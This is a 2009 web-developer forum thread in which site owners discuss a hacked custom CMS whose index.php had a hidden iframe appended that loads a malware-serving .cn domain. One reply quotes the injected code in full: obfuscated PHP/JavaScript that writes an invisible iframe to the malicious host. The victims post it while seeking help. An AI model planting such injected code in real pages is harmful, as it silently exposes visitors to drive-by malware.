My First 'Hacker'

aristoworks · 07-04-2009, 03:29 AM

I've been involved with over 250 websites in one capacity or another but my first site was just hacked. It is a custom CMS that I put on most sites. Not a 'customized' CMS rather one I built from scratch.

Somehow a hacker inserted some javascript code that ended up embedding itself at the very end of my index.php file that was an iframe which led to a site called 'mi-cr-o-sot-f.cn' (without the dashes) which is a pdf file containing a virus.

I'm trying to figure out where in the heck the vulnerability is. I'm sanitizing ALL of the inputs both from general users and administrators.

The site is on a dedicated server which I manage and the bug hasn't ended up on any other pages or sites on this server.

I'm trying to figure out how someone might be able to inject this code and put it on my index page.

Any ideas?

Village Idiot · 07-04-2009, 03:32 AM

Quote:

Originally Posted by aristoworks

I've been involved with over 250 websites in one capacity or another but my first site was just hacked. It is a custom CMS that I put on most sites. Not a 'customized' CMS rather one I built from scratch.

Somehow a hacker inserted some javascript code that ended up embedding itself at the very end of my index.php file that was an iframe which led to a site called 'mi-cr-o-sot-f.cn' (without the dashes) which is a pdf file containing a virus.

I'm trying to figure out where in the heck the vulnerability is. I'm sanitizing ALL of the inputs both from general users and administrators.

The site is on a dedicated server which I manage and the bug hasn't ended up on any other pages or sites on this server.

I'm trying to figure out how someone might be able to inject this code and put it on my index page.

Any ideas?

Can you show us your cleaning processes? You can't just say "my site is secure, whats wrong" because your site is obviously not secure.

Could we also see the site? We can't solve a problem unless you show us it.

CoryMathews · 07-04-2009, 09:10 PM

I'm guessing it was injected into the database/filesystem. So the problem lies there, more then likely. So something in your process must be wrong. as village idiot says we need to see some code.

ryanmr · 07-05-2009, 08:35 PM

It would be quite interesting to see some first hand injection. Most people just see examples and that covers their experience with it. The Spanner is an excellent site to see what browsers will accept and actually parse as javascript, so it's not always so clear cut.

Also, @Village Idiot, I love your signature, your secret is safe with me.

cecilia · 07-06-2009, 11:41 PM

Aristo Ive been attacked myself, I even made a thread about it.

Inserting into the index

This is the latest version of it that I got:

PHP Code:


			
<?php echo '<script>document.write("<if"+'ra'+"m"+'e s'+"rc=\"h"+'tt'+"p:"+''+"/"+'/mic'+"roso"+'t'+'f.c'+"n"+'/'+"\" wid"+'th=1 he'+"igh"+'t'+"="+"2></i"+"f"+"ra"+''+""+''+"me"+'>');</script>'; ?><?php echo ''; ?><?php echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>'; ?>

To date ive seen 4 incarnations of this damn thing already. From what ive read, the problem is with the web hosts hardware configuration, theres usually a security leak there. Another said cause are non-updated bulletin board scripts, which was not the case for me since I have removed that completely already and I still got attacked again.

I have a theory on how to deal with this problem on our side, redirection. It doesnt have to be index.php all the time right?

jcorradino · 07-10-2009, 02:52 AM

what was said above is what is most likely causing it. I have seen this happen before, and if you are properly cleaning inputs, then I would guess that it is the fault of a web host vulnerability.